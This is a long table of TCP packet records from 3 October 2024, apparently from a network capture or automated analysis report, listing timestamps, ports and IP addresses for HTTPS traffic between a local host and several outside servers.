                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.825381994 CEST49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.825395107 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.876005888 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.876243114 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.876267910 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.877155066 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.877222061 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.880388975 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.880680084 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.880686998 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.882122993 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:56:59.882193089 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.311168909 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.311388969 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.313167095 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.313364029 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.314305067 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.314351082 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.363614082 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.363645077 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.363686085 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.412466049 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.484255075 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.484374046 CEST49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.490894079 CEST49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.490909100 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.491141081 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.494160891 CEST49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.535423040 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.713335037 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.713805914 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.713872910 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.713896990 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.713952065 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.714032888 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.714040995 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.726541996 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.726579905 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.726651907 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.726902962 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.726913929 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.728547096 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.728622913 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.728635073 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.730346918 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.730434895 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.730451107 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.730585098 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.730631113 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.760194063 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.760365963 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.760425091 CEST49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.761800051 CEST49754443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.761827946 CEST44349754188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.810730934 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.821351051 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.821388960 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.821470022 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.822201014 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.822213888 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.835311890 CEST49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.835329056 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.835424900 CEST49755443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.835431099 CEST44349755184.28.90.27192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:00.851444006 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.215490103 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.215976000 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.215991974 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.217638969 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.217701912 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.219610929 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.219693899 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.220032930 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.220038891 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.268876076 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.288532019 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.288605928 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.288660049 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.289722919 CEST49753443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.289743900 CEST44349753188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.298033953 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.299123049 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.299139023 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.300194979 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.300249100 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.307590961 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.307652950 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.307673931 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.307868004 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.307912111 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.308038950 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.308057070 CEST44349758188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.308084011 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.308118105 CEST49758443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.308796883 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.308826923 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.309015989 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.310826063 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.310833931 CEST44349760188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.310889959 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.311505079 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.311517954 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.312566042 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.312583923 CEST44349760188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.345824957 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.345911980 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.345959902 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.346602917 CEST49757443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.346620083 CEST4434975735.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.348192930 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.348233938 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.348288059 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.348790884 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.348804951 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.806497097 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.810162067 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.811036110 CEST44349760188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.832928896 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.832946062 CEST44349760188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.833115101 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.833122015 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.833558083 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.833592892 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.833749056 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.833934069 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.834146976 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.834232092 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.834431887 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.834496021 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.834573030 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.834628105 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.836680889 CEST44349760188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.836797953 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.838082075 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.838165045 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.838273048 CEST44349760188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.838589907 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.838601112 CEST44349760188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.838767052 CEST49760443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.839896917 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.839932919 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.839989901 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.840751886 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.840764046 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.875406981 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.879426003 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.977329016 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.977586031 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.977669001 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.992866039 CEST49761443192.168.2.435.190.80.1
                                                                                                                                                                                                                                Oct 3, 2024 22:57:01.992897987 CEST4434976135.190.80.1192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.330039024 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.330373049 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.330390930 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.331500053 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.331926107 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.332096100 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.332664013 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.379435062 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.477338076 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.477523088 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.477591991 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.478492975 CEST49762443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.478523016 CEST44349762188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.482969999 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.483015060 CEST44349763188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.483078003 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.483640909 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.483654976 CEST44349763188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.511214972 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.511262894 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.511357069 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.511400938 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.511444092 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.621951103 CEST49759443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.621977091 CEST44349759188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.720963001 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.720997095 CEST44349764188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.721203089 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.721498966 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.721515894 CEST44349764188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.949743986 CEST44349763188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.949989080 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.950012922 CEST44349763188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.950885057 CEST44349763188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951055050 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951261997 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951261997 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951314926 CEST44349763188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951360941 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951360941 CEST49763443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951579094 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951620102 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951688051 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951877117 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:02.951889992 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.189361095 CEST44349764188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.189608097 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.189634085 CEST44349764188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.190646887 CEST44349764188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.190710068 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.190994978 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191009045 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191051960 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191077948 CEST44349764188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191128016 CEST49764443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191421032 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191478014 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191557884 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191745996 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.191754103 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.409507036 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.409815073 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.409837961 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.410706043 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.410763979 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.411050081 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.411102057 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.411844969 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.411851883 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.457278013 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558101892 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558151007 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558176994 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558192968 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558204889 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558243036 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558244944 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558252096 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558295965 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558300972 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558367968 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.558406115 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.561999083 CEST49767443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.562011957 CEST44349767188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.594074011 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.594120979 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.594187975 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.599114895 CEST49769443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.599145889 CEST44349769188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.651371956 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.651765108 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.651804924 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.653261900 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.653342962 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.653820038 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.653907061 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.666095018 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.666112900 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.666187048 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.666207075 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.666223049 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.860104084 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.860187054 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.860265017 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.861313105 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.861361980 CEST44349768188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.861388922 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.861428022 CEST49768443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.875324965 CEST49770443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.875368118 CEST44349770188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.875438929 CEST49770443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.876147985 CEST49770443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.876166105 CEST44349770188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.977515936 CEST49771443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.977547884 CEST44349771104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.977602005 CEST49771443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.977926016 CEST49771443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:03.977941036 CEST44349771104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.012603998 CEST49772443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.012643099 CEST44349772185.15.59.240192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.012799978 CEST49772443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                Oct 3, 2024 22:57:04.012984991 CEST49772443192.168.2.4185.15.59.240
